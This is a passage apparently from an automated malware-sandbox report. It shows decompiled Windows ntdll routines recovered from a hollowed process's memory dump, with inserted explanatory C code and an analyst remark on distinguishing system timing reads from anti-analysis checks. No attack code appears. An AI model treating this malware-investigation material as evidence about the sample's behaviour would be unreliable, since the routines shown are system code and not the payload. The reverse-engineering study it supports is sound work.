                                              							if(_t147 == 0) {
                                              								L35:
                                              								E018FB090(_t179 + 0x34, _t147, _v68, _t132);
                                              								if(_a8 == 0) {
                                              									E018FFFB0(_t132, _t177, _t179 + 0x30);
                                              								}
                                              								asm("lock xadd [eax], ecx");
                                              								asm("lock xadd [eax], edx");
                                              								_t132 = 0;
                                              								_v72 = _v72 & 0;
                                              								_v68 = _v72;
                                              								if(E01907D50() == 0) {
                                              									_t113 = 0x7ffe0388;
                                              								} else {
                                              									_t177 = _v64;
                                              									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                              								}
                                              								if( *_t113 == _t132) {
                                              									_t166 = _v68;
                                              									goto L46;
                                              								} else {
                                              									_t166 = _v68;
                                              									E0199FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                              									goto L12;
                                              								}
                                              							} else {
                                              								L23:
                                              								while(1) {
                                              									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                              										_t122 =  *_t147;
                                              										if(_t159 == 0) {
                                              											L32:
                                              											if(_t122 == 0) {
                                              												L34:
                                              												_v68 = 0;
                                              												goto L35;
                                              											}
                                              											L33:
                                              											_t147 = _t122;
                                              											continue;
                                              										}
                                              										if(_t122 == 0) {
                                              											goto L34;
                                              										}
                                              										_t122 = _t122 ^ _t147;
                                              										goto L32;
                                              									}
                                              									_t122 =  *(_t147 + 4);
                                              									if(_t159 == 0) {
                                              										L27:
                                              										if(_t122 != 0) {
                                              											goto L33;
                                              										}
                                              										L28:
                                              										_v68 = 1;
                                              										goto L35;
                                              									}
                                              									if(_t122 == 0) {
                                              										goto L28;
                                              									}
                                              									_t122 = _t122 ^ _t147;
                                              									goto L27;
                                              								}
                                              							}
                                              						}
                                              					}
                                              					_v72 = _v72 & 0x00000000;
                                              					goto L11;
                                              				}
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: `$`
                                              • API String ID: 0-197956300
                                              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction ID: fadee3e50c9157a2b2f7ff8f9c525d63a6108d197412ec29867939e7034e857c
                                              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction Fuzzy Hash: 43918F316043429FE725CE29C845B1BBBE9AFC4715F54892DF699CB280E774E908CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 77%
                                              			E019651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                              				signed short* _t63;
                                              				signed int _t64;
                                              				signed int _t65;
                                              				signed int _t67;
                                              				intOrPtr _t74;
                                              				intOrPtr _t84;
                                              				intOrPtr _t88;
                                              				intOrPtr _t94;
                                              				void* _t100;
                                              				void* _t103;
                                              				intOrPtr _t105;
                                              				signed int _t106;
                                              				short* _t108;
                                              				signed int _t110;
                                              				signed int _t113;
                                              				signed int* _t115;
                                              				signed short* _t117;
                                              				void* _t118;
                                              				void* _t119;
                                              
                                              				_push(0x80);
                                              				_push(0x19c05f0);
                                              				E0193D0E8(__ebx, __edi, __esi);
                                              				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                              				_t115 =  *(_t118 + 0xc);
                                              				 *(_t118 - 0x7c) = _t115;
                                              				 *((char*)(_t118 - 0x65)) = 0;
                                              				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                              				_t113 = 0;
                                              				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                              				 *((intOrPtr*)(_t118 - 4)) = 0;
                                              				_t100 = __ecx;
                                              				if(_t100 == 0) {
                                              					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                              					E018FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                              					 *((char*)(_t118 - 0x65)) = 1;
                                              					_t63 =  *(_t118 - 0x90);
                                              					_t101 = _t63[2];
                                              					_t64 =  *_t63 & 0x0000ffff;
                                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                              					L20:
                                              					_t65 = _t64 >> 1;
                                              					L21:
                                              					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                              					if(_t108 == 0) {
                                              						L27:
                                              						 *_t115 = _t65 + 1;
                                              						_t67 = 0xc0000023;
                                              						L28:
                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                              						L29:
                                              						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                              						E019653CA(0);
                                              						return E0193D130(0, _t113, _t115);
                                              					}
                                              					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                              						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                              							 *_t108 = 0;
                                              						}
                                              						goto L27;
                                              					}
                                              					 *_t115 = _t65;
                                              					_t115 = _t65 + _t65;
                                              					E0192F3E0(_t108, _t101, _t115);
                                              					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                              					_t67 = 0;
                                              					goto L28;
                                              				}
                                              				_t103 = _t100 - 1;
                                              				if(_t103 == 0) {
                                              					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                              					_t74 = E01903690(1, _t117, 0x18c1810, _t118 - 0x74);
                                              					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                              					_t101 = _t117[2];
                                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                              					if(_t74 < 0) {
                                              						_t64 =  *_t117 & 0x0000ffff;
                                              						_t115 =  *(_t118 - 0x7c);
                                              						goto L20;
                                              					}
                                              					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                              					_t115 =  *(_t118 - 0x7c);
                                              					goto L21;
                                              				}
                                              				if(_t103 == 1) {
                                              					_t105 = 4;
                                              					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                              					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                              					_push(_t118 - 0x70);
                                              					_push(0);
                                              					_push(0);
                                              					_push(_t105);
                                              					_push(_t118 - 0x78);
                                              					_push(0x6b);
                                              					 *((intOrPtr*)(_t118 - 0x64)) = E0192AA90();
                                              					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                              					_t113 = L01904620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                              					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                              					if(_t113 != 0) {
                                              						_push(_t118 - 0x70);
                                              						_push( *((intOrPtr*)(_t118 - 0x70)));
                                              						_push(_t113);
                                              						_push(4);
                                              						_push(_t118 - 0x78);
                                              						_push(0x6b);
                                              						_t84 = E0192AA90();
                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                              						if(_t84 < 0) {
                                              							goto L29;
                                              						}
                                              						_t110 = 0;
                                              						_t106 = 0;
                                              						while(1) {
                                              							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                              							 *(_t118 - 0x88) = _t106;
                                              							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                              								break;
                                              							}
                                              							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                              							_t106 = _t106 + 1;
                                              						}
                                              						_t88 = E0196500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                              						_t119 = _t119 + 0x1c;
                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                              						if(_t88 < 0) {
                                              							goto L29;
                                              						}
                                              						_t101 = _t118 - 0x3c;
                                              						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                              						goto L21;
                                              					}
                                              					_t67 = 0xc0000017;
                                              					goto L28;
                                              				}
                                              				_push(0);
                                              				_push(0x20);
                                              				_push(_t118 - 0x60);
                                              				_push(0x5a);
                                              				_t94 = E01929860();
                                              				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                              				if(_t94 < 0) {
                                              					goto L29;
                                              				}
                                              				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                              					_t101 = L"Legacy";
                                              					_push(6);
                                              				} else {
                                              					_t101 = L"UEFI";
                                              					_push(4);
                                              				}
                                              				_pop(_t65);
                                              				goto L21;
			}

Instruction address column (flattened from the listing; the row-to-line alignment is not recoverable): 0x019651be through 0x019653bf, with 0x00000000 entries for unresolved branch targets.

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: Legacy$UEFI
                                              • API String ID: 2994545307-634100481
                                              • Opcode ID: 6a9301f9b91f793b1b25e3f95a2af17c13b8cf9b6305817aaca67a383ff27440
                                              • Instruction ID: cf688324e3c5a479a7c06eba18ecc9ce9ae6caf161456344f37e4c6bbac81676
                                              • Opcode Fuzzy Hash: 6a9301f9b91f793b1b25e3f95a2af17c13b8cf9b6305817aaca67a383ff27440
                                              • Instruction Fuzzy Hash: 54515E71A00619DFEB15DFA9C980EAEBBF8FF44B40F15442DE64DEB251D6719900CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%
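
The routine above has two branches: one queries information class 0x5a into a 0x20-byte buffer and picks "Legacy" (6 characters) when the dword at offset 0x10 equals 1, otherwise "UEFI" (4 characters); the other walks a buffer with a 16-bit count at +0xa and records 0x2c bytes apart, summing the byte at +0x21 of each and formatting the total with "%u". The following is an added C example, not code from the report or from ntdll, that reproduces both branches on constructed buffers. The identification of class 0x5a as SystemBootEnvironmentInformation and of the 0x20-byte record as SYSTEM_BOOT_ENVIRONMENT_INFORMATION (GUID, FirmwareType, BootFlags) is an assumption; the page shows only the class number, the buffer size and the offset. The bounds check in sum_record_bytes is also added here; the decompiled loop trusts the length returned by the earlier query.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed identification, not stated on the page: information class 0x5a is
 * SystemBootEnvironmentInformation, and the 0x20-byte record is
 * SYSTEM_BOOT_ENVIRONMENT_INFORMATION { GUID BootIdentifier; ULONG FirmwareType;
 * ULONGLONG BootFlags; }. The decompile itself only shows class 0x5a, a 0x20-byte
 * buffer, a dword at buffer+0x10 compared with 1, and "Legacy" (6 chars) vs
 * "UEFI" (4 chars) as the result. */
#define BOOT_ENV_INFO_SIZE    0x20
#define BOOT_ENV_FIRMWARE_OFF 0x10

/* Firmware branch: selects the string the routine pushes and its character count. */
const char *firmware_type_string(const uint8_t *boot_env, size_t *len)
{
    uint32_t firmware_type;
    memcpy(&firmware_type, boot_env + BOOT_ENV_FIRMWARE_OFF, sizeof firmware_type);
    if (firmware_type == 1) {     /* FirmwareTypeBios in the assumed enum */
        *len = 6;
        return "Legacy";
    }
    *len = 4;
    return "UEFI";
}

/* Record branch, reproduced from the arithmetic the decompile shows: a 16-bit
 * count at +0xa, records 0x2c bytes apart, the byte at +0x21 of each record
 * summed and printed with "%u". The record type itself is not recoverable from
 * the page, so the buffer is treated as opaque bytes. */
#define REC_COUNT_OFF 0x0a
#define REC_STRIDE    0x2c
#define REC_BYTE_OFF  0x21

/* Returns the formatted length, or -1 if the advertised count does not fit in
 * buf_len. The decompiled loop does no such check; it trusts the length the
 * earlier query returned. */
int sum_record_bytes(const uint8_t *buf, size_t buf_len, char *out, size_t out_len)
{
    if (buf_len < REC_COUNT_OFF + 2)
        return -1;
    uint16_t count = (uint16_t)(buf[REC_COUNT_OFF] | (buf[REC_COUNT_OFF + 1] << 8));
    if (count != 0 && (size_t)(count - 1) * REC_STRIDE + REC_BYTE_OFF >= buf_len)
        return -1;
    uint32_t total = 0;
    for (uint16_t i = 0; i < count; i++)
        total += buf[(size_t)i * REC_STRIDE + REC_BYTE_OFF];
    int n = snprintf(out, out_len, "%u", total);
    if (n < 0 || (size_t)n >= out_len)
        return -1;
    return n;
}

int main(void)
{
    uint8_t boot_env[BOOT_ENV_INFO_SIZE] = {0};   /* constructed sample, FirmwareType = 2 */
    boot_env[BOOT_ENV_FIRMWARE_OFF] = 2;
    size_t len;
    printf("%s (%zu)\n", firmware_type_string(boot_env, &len), len);
    return 0;
}
```

The returned lengths (6 and 4, or the snprintf length) correspond to the value the decompile leaves in _t65 before jumping to L21: the character count of the string passed on, computed in the "%u" branch as the byte difference shifted right by one.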

                                              C-Code - Quality: 76%
                                              			E0190B944(signed int* __ecx, char __edx) {
                                              				signed int _v8;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				char _v28;
                                              				signed int _v32;
                                              				char _v36;
                                              				signed int _v40;
                                              				intOrPtr _v44;
                                              				signed int* _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				intOrPtr _v60;
                                              				intOrPtr _v64;
                                              				intOrPtr _v68;
                                              				intOrPtr _v72;
                                              				intOrPtr _v76;
                                              				char _v77;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr* _t65;
                                              				intOrPtr _t67;
                                              				intOrPtr _t68;
                                              				char* _t73;
                                              				intOrPtr _t77;
                                              				intOrPtr _t78;
                                              				signed int _t82;
                                              				intOrPtr _t83;
                                              				void* _t87;
                                              				char _t88;
                                              				intOrPtr* _t89;
                                              				intOrPtr _t91;
                                              				void* _t97;
                                              				intOrPtr _t100;
                                              				void* _t102;
                                              				void* _t107;
                                              				signed int _t108;
                                              				intOrPtr* _t112;
                                              				void* _t113;
                                              				intOrPtr* _t114;
                                              				intOrPtr _t115;
                                              				intOrPtr _t116;
                                              				intOrPtr _t117;
                                              				signed int _t118;
                                              				void* _t130;
                                              
                                              				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                              				_v8 =  *0x19dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                              				_t112 = __ecx;
                                              				_v77 = __edx;
                                              				_v48 = __ecx;
                                              				_v28 = 0;
                                              				_t5 = _t112 + 0xc; // 0x575651ff
                                              				_t105 =  *_t5;
                                              				_v20 = 0;
                                              				_v16 = 0;
                                              				if(_t105 == 0) {
                                              					_t50 = _t112 + 4; // 0x5de58b5b
                                              					_t60 =  *__ecx |  *_t50;
                                              					if(( *__ecx |  *_t50) != 0) {
                                              						 *__ecx = 0;
                                              						__ecx[1] = 0;
                                              						if(E01907D50() != 0) {
                                              							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              						} else {
                                              							_t65 = 0x7ffe0386;
                                              						}
                                              						if( *_t65 != 0) {
                                              							E019B8CD6(_t112);
                                              						}
                                              						_push(0);
                                              						_t52 = _t112 + 0x10; // 0x778df98b
                                              						_push( *_t52);
                                              						_t60 = E01929E20();
                                              					}
                                              					L20:
                                              					_pop(_t107);
                                              					_pop(_t113);
                                              					_pop(_t87);
                                              					return E0192B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                              				}
                                              				_t8 = _t112 + 8; // 0x8b000cc2
                                              				_t67 =  *_t8;
                                              				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                              				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                              				_t108 =  *(_t67 + 0x14);
                                              				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                              				_t105 = 0x2710;
                                              				asm("sbb eax, edi");
                                              				_v44 = _t88;
                                              				_v52 = _t108;
                                              				_t60 = E0192CE00(_t97, _t68, 0x2710, 0);
                                              				_v56 = _t60;
                                              				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                              					L3:
                                              					 *(_t112 + 0x44) = _t60;
                                              					_t105 = _t60 * 0x2710 >> 0x20;
                                              					 *_t112 = _t88;
                                              					 *(_t112 + 4) = _t108;
                                              					_v20 = _t60 * 0x2710;
                                              					_v16 = _t60 * 0x2710 >> 0x20;
                                              					if(_v77 != 0) {
                                              						L16:
                                              						_v36 = _t88;
                                              						_v32 = _t108;
                                              						if(E01907D50() != 0) {
                                              							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              						} else {
                                              							_t73 = 0x7ffe0386;
                                              						}
                                              						if( *_t73 != 0) {
                                              							_t105 = _v40;
                                              							E019B8F6A(_t112, _v40, _t88, _t108);
                                              						}
                                              						_push( &_v28);
                                              						_push(0);
                                              						_push( &_v36);
                                              						_t48 = _t112 + 0x10; // 0x778df98b
                                              						_push( *_t48);
                                              						_t60 = E0192AF60();
                                              						goto L20;
                                              					} else {
                                              						_t89 = 0x7ffe03b0;
                                              						do {
                                              							_t114 = 0x7ffe0010;
                                              							do {
                                              								_t77 =  *0x19d8628; // 0x0
                                              								_v68 = _t77;
                                              								_t78 =  *0x19d862c; // 0x0
                                              								_v64 = _t78;
                                              								_v72 =  *_t89;
                                              								_v76 =  *((intOrPtr*)(_t89 + 4));
                                              								while(1) {
                                              									_t105 =  *0x7ffe000c;
                                              									_t100 =  *0x7ffe0008;
                                              									if(_t105 ==  *_t114) {
                                              										goto L8;
                                              									}
                                              									asm("pause");
                                              								}
                                              								L8:
                                              								_t89 = 0x7ffe03b0;
                                              								_t115 =  *0x7ffe03b0;
                                              								_t82 =  *0x7FFE03B4;
                                              								_v60 = _t115;
                                              								_t114 = 0x7ffe0010;
                                              								_v56 = _t82;
                                              							} while (_v72 != _t115 || _v76 != _t82);
                                              							_t83 =  *0x19d8628; // 0x0
                                              							_t116 =  *0x19d862c; // 0x0
                                              							_v76 = _t116;
                                              							_t117 = _v68;
                                              						} while (_t117 != _t83 || _v64 != _v76);
                                              						asm("sbb edx, [esp+0x24]");
                                              						_t102 = _t100 - _v60 - _t117;
                                              						_t112 = _v48;
                                              						_t91 = _v44;
                                              						asm("sbb edx, eax");
                                              						_t130 = _t105 - _v52;
                                              						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                              							_t88 = _t102 - _t91;
                                              							asm("sbb edx, edi");
                                              							_t108 = _t105;
                                              						} else {
                                              							_t88 = 0;
                                              							_t108 = 0;
                                              						}
                                              						goto L16;
                                              					}
                                              				} else {
                                              					if( *(_t112 + 0x44) == _t60) {
                                              						goto L20;
                                              					}
                                              					goto L3;
                                              				}
			}

Instruction address column (flattened from the listing; the row-to-line alignment is not recoverable): 0x0190b94c through 0x0190bb26, plus an out-of-line block at 0x01952cb8 through 0x01952cdd and 0x00000000 entries for unresolved branch targets.

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0190B9A5
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 885266447-0
                                              • Opcode ID: d342a66e0ba1145fbca4cc04a04c78d6188a720b42d93e73e3fd173c834fec2b
                                              • Instruction ID: b5390e925eb39b181f40a5e1c3f20ddc7e34055d576a2095a24e534f6182f676
                                              • Opcode Fuzzy Hash: d342a66e0ba1145fbca4cc04a04c78d6188a720b42d93e73e3fd173c834fec2b
                                              • Instruction Fuzzy Hash: 6B516C75A08301CFC722CF69C08092ABBE9FB88715F54496EE59A97385D730E884CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%
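
The inner loop of E0190B944 reads 0x7ffe000c, then 0x7ffe0008, and spins on "pause" until the first value matches 0x7ffe0010: the lock-free read of a 64-bit time value that the kernel updates in place, which the report's "Contains functionality for execution timing" signature refers to. The added C example below is not code from the report or from ntdll; it models that three-dword record and the reader, plus a simulated writer so that a torn read can actually be provoked and shown to be rejected. The field names LowPart, High1Time and High2Time are the documented KSYSTEM_TIME names and the writer's update order are assumptions; the page shows only the addresses and the compare. The outer loop in the decompile, which repeats the same pattern over 0x7ffe03b0/0x7ffe03b4 and two module globals, is not reproduced.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Three-dword time record at the addresses the decompiled loop dereferences:
 * 0x7ffe0008 (LowPart), 0x7ffe000c (High1Time), 0x7ffe0010 (High2Time), i.e.
 * KUSER_SHARED_DATA.InterruptTime. The field names are the documented
 * KSYSTEM_TIME names and are an assumption here; the page shows only the
 * addresses. */
typedef struct {
    volatile uint32_t LowPart;
    volatile int32_t  High1Time;
    volatile int32_t  High2Time;
} ksystem_time;

/* One pass of the reader: High1Time, then LowPart, then compare with High2Time.
 * Returns false when the two high words disagree, which is the signal the
 * decompiled loop handles with "pause" and another iteration. */
bool ksystem_time_try_read(const ksystem_time *t, int64_t *out)
{
    int32_t high1 = t->High1Time;
    uint32_t low = t->LowPart;
    if (high1 != t->High2Time)
        return false;
    *out = ((int64_t)high1 << 32) | low;
    return true;
}

/* The full retry loop. In ntdll the loop body is the "pause" instruction seen
 * in the decompile; here the retries are only counted for the caller. */
int64_t ksystem_time_read(const ksystem_time *t, unsigned *retries)
{
    int64_t value;
    unsigned n = 0;
    while (!ksystem_time_try_read(t, &value))
        n++;
    if (retries)
        *retries = n;
    return value;
}

/* Simulated writer. Assumed update order (High2Time, LowPart, High1Time): a
 * reader that picked up the old High1Time and then sees the new High2Time knows
 * its LowPart may belong to either value and retries. The hook lets the demo
 * run a reader in the middle of the update. */
typedef void (*mid_write_hook)(void *ctx);

void ksystem_time_write(ksystem_time *t, int64_t value, mid_write_hook hook, void *ctx)
{
    t->High2Time = (int32_t)(value >> 32);
    if (hook)
        hook(ctx);
    t->LowPart = (uint32_t)value;
    t->High1Time = (int32_t)(value >> 32);
}

/* 0x2710 (10000) 100-ns units per millisecond, the divisor the decompile uses
 * (E0192CE00(delta, 0x2710)) before multiplying back to whole milliseconds. */
int64_t interval_100ns_to_ms(int64_t delta_100ns)
{
    return delta_100ns / 10000;
}

typedef struct {
    ksystem_time *t;
    bool saw_consistent;
    int64_t value;
} probe_ctx;

static void probe_hook(void *p)
{
    probe_ctx *c = p;
    c->saw_consistent = ksystem_time_try_read(c->t, &c->value);
}

/* Returns true when the mid-update probe is rejected and the read after the
 * update completes returns the new value without retrying. Constructed values
 * cross a 32-bit boundary so the high word actually changes. */
bool demo_torn_read_is_detected(void)
{
    ksystem_time t = { 0xFFFFFFF0u, 0, 0 };      /* 0x00000000FFFFFFF0 */
    probe_ctx c = { &t, true, 0 };
    ksystem_time_write(&t, 0x100000010LL, probe_hook, &c);
    unsigned retries = 0;
    int64_t v = ksystem_time_read(&t, &retries);
    return !c.saw_consistent && v == 0x100000010LL && retries == 0;
}

int main(void)
{
    printf("torn read detected: %s\n", demo_torn_read_is_detected() ? "yes" : "no");
    return 0;
}
```

The check only catches tears that change the high word; an update that leaves the high word alone can be observed as either the old or the new value, both of which are valid readings, so nothing is lost. When analysing a sample that reads these addresses directly rather than through an API, this is the pattern to recognise before concluding it is an anti-analysis timing check: here it sits inside an ntdll timer routine mapped into the hollowed process, not in the payload.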

                                              C-Code - Quality: 78%
                                              			E018EB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                              				signed int _t65;
                                              				signed short _t69;
                                              				intOrPtr _t70;
                                              				signed short _t85;
                                              				void* _t86;
                                              				signed short _t89;
                                              				signed short _t91;
                                              				intOrPtr _t92;
                                              				intOrPtr _t97;
                                              				intOrPtr* _t98;
                                              				signed short _t99;
                                              				signed short _t101;
                                              				void* _t102;
                                              				char* _t103;
                                              				signed short _t104;
                                              				intOrPtr* _t110;
                                              				void* _t111;
                                              				void* _t114;
                                              				intOrPtr* _t115;
                                              
                                              				_t109 = __esi;
                                              				_t108 = __edi;
                                              				_t106 = __edx;
                                              				_t95 = __ebx;
                                              				_push(0x90);
                                              				_push(0x19bf7a8);
                                              				E0193D0E8(__ebx, __edi, __esi);
                                              				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                              				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                              				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                              				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                              				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                              				if(__edx == 0xffffffff) {
                                              					L6:
                                              					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                              					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                              					__eflags = _t65 & 0x00000002;
                                              					if((_t65 & 0x00000002) != 0) {
                                              						L3:
                                              						L4:
                                              						return E0193D130(_t95, _t108, _t109);
                                              					}
                                              					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                              					_t108 = 0;
                                              					_t109 = 0;
                                              					_t95 = 0;
                                              					__eflags = 0;
                                              					while(1) {
                                              						__eflags = _t95 - 0x200;
                                              						if(_t95 >= 0x200) {
                                              							break;
                                              						}
                                              						E0192D000(0x80);
                                              						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                              						_t108 = _t115;
                                              						_t95 = _t95 - 0xffffff80;
                                              						_t17 = _t114 - 4;
                                              						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                              						__eflags =  *_t17;
                                              						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                              						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                              						_t102 = _t110 + 1;
                                              						do {
                                              							_t85 =  *_t110;
                                              							_t110 = _t110 + 1;
                                              							__eflags = _t85;
                                              						} while (_t85 != 0);
                                              						_t111 = _t110 - _t102;
                                              						_t21 = _t95 - 1; // -129
                                              						_t86 = _t21;
                                              						__eflags = _t111 - _t86;
                                              						if(_t111 > _t86) {
                                              							_t111 = _t86;
                                              						}
                                              						E0192F3E0(_t108, _t106, _t111);
                                              						_t115 = _t115 + 0xc;
                                              						_t103 = _t111 + _t108;
                                              						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                              						_t89 = _t95 - _t111;
                                              						__eflags = _t89;
                                              						_push(0);
                                              						if(_t89 == 0) {
                                              							L15:
                                              							_t109 = 0xc000000d;
                                              							goto L16;
                                              						} else {
                                              							__eflags = _t89 - 0x7fffffff;
                                              							if(_t89 <= 0x7fffffff) {
                                              								L16:
                                              								 *(_t114 - 0x94) = _t109;
                                              								__eflags = _t109;
                                              								if(_t109 < 0) {
                                              									__eflags = _t89;
                                              									if(_t89 != 0) {
                                              										 *_t103 = 0;
                                              									}
                                              									L26:
                                              									 *(_t114 - 0xa0) = _t109;
                                              									 *(_t114 - 4) = 0xfffffffe;
                                              									__eflags = _t109;
                                              									if(_t109 >= 0) {
                                              										L31:
                                              										_t98 = _t108;
                                              										_t39 = _t98 + 1; // 0x1
                                              										_t106 = _t39;
                                              										do {
                                              											_t69 =  *_t98;
                                              											_t98 = _t98 + 1;
                                              											__eflags = _t69;
                                              										} while (_t69 != 0);
                                              										_t99 = _t98 - _t106;
                                              										__eflags = _t99;
                                              										L34:
                                              										_t70 =  *[fs:0x30];
                                              										__eflags =  *((char*)(_t70 + 2));
                                              										if( *((char*)(_t70 + 2)) != 0) {
                                              											L40:
                                              											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                              											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                              											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                              											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                              											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                              											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                              											 *(_t114 - 4) = 1;
                                              											_push(_t114 - 0x74);
                                              											L0193DEF0(_t99, _t106);
                                              											 *(_t114 - 4) = 0xfffffffe;
                                              											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                              											goto L3;
                                              										}
                                              										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                              										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                              											goto L40;
                                              										}
                                              										_push( *((intOrPtr*)(_t114 + 8)));
                                              										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                              										_push(_t99 & 0x0000ffff);
                                              										_push(_t108);
                                              										_push(1);
                                              										_t101 = E0192B280();
                                              										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                              										if( *((char*)(_t114 + 0x14)) == 1) {
                                              											__eflags = _t101 - 0x80000003;
                                              											if(_t101 == 0x80000003) {
                                              												E0192B7E0(1);
                                              												_t101 = 0;
                                              												__eflags = 0;
                                              											}
                                              										}
                                              										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                              										goto L4;
                                              									}
                                              									__eflags = _t109 - 0x80000005;
                                              									if(_t109 == 0x80000005) {
                                              										continue;
                                              									}
                                              									break;
                                              								}
                                              								 *(_t114 - 0x90) = 0;
                                              								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                              								_t91 = E0192E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                              								_t115 = _t115 + 0x10;
                                              								_t104 = _t91;
                                              								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                              								__eflags = _t104;
                                              								if(_t104 < 0) {
                                              									L21:
                                              									_t109 = 0x80000005;
                                              									 *(_t114 - 0x90) = 0x80000005;
                                              									L22:
